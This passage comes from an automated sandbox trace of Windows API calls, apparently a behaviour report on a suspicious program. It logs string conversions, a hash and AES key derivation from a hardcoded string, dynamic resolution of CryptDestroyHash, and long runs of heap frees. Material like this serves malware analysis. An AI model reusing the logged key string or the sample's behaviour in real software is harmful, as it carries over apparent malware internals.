cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0094.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2788, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0094.766] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0094.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0094.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0094.766] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.766] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cac70, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0094.767] CryptHashData (hHash=0x41abfc0, pbData=0x17e2728, dwDataLen=0x22, dwFlags=0x1) returned 1 [0094.767] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.767] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0094.767] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0094.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cad78, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0094.767] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41abfc0, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac2c0) returned 1 [0094.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0094.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0094.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0094.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0094.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0094.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0094.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0094.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0094.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0094.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0094.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0094.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0094.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0094.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0094.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0094.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0094.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0094.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0094.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0094.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0094.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0094.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0094.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0094.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0094.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0094.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0094.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0094.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0094.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0094.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0094.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0094.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0094.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0094.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0094.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0094.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0094.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0094.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0094.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0094.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0094.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0094.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0094.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0094.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0094.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0094.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0094.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0094.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0094.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0094.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0094.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0094.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0094.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0094.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0094.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0094.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0094.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0094.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0094.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0094.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0094.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0094.769] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0094.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0094.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0094.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0094.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0094.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0094.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0094.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0094.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0094.770] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0094.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0094.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0094.770] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0094.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0094.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0094.770] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0094.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0094.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0094.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0094.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0094.770] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0094.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0094.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0094.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0094.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0094.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0094.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0094.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0094.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0094.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0094.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0094.771] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0094.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0094.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0094.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0094.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0094.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0094.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0094.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0094.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0094.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796d88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0094.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0094.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0094.772] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0094.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0094.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0094.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0094.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0094.772] CryptDestroyHash (hHash=0x41abfc0) returned 1 [0094.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0094.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0094.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0094.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0094.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0094.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0094.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0094.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0094.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0094.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0094.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0094.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0094.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0094.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0094.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0094.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0094.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0094.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0094.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0094.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0094.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0094.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0094.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0094.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0094.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0094.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0094.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0094.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0094.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0094.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0094.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0094.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0094.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0094.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0094.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0094.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0094.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0094.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0094.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0094.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0094.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0094.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0094.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0094.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0094.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0094.774] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0094.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0094.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0094.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0094.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0094.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0094.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0094.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0094.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0094.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0094.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0094.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0094.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0094.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0094.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0094.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0094.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0094.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0094.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0094.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0094.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0094.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0094.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0094.774] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0094.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0094.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0094.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0094.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0094.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0094.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0094.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0094.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0094.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0094.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0094.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0094.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0094.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: 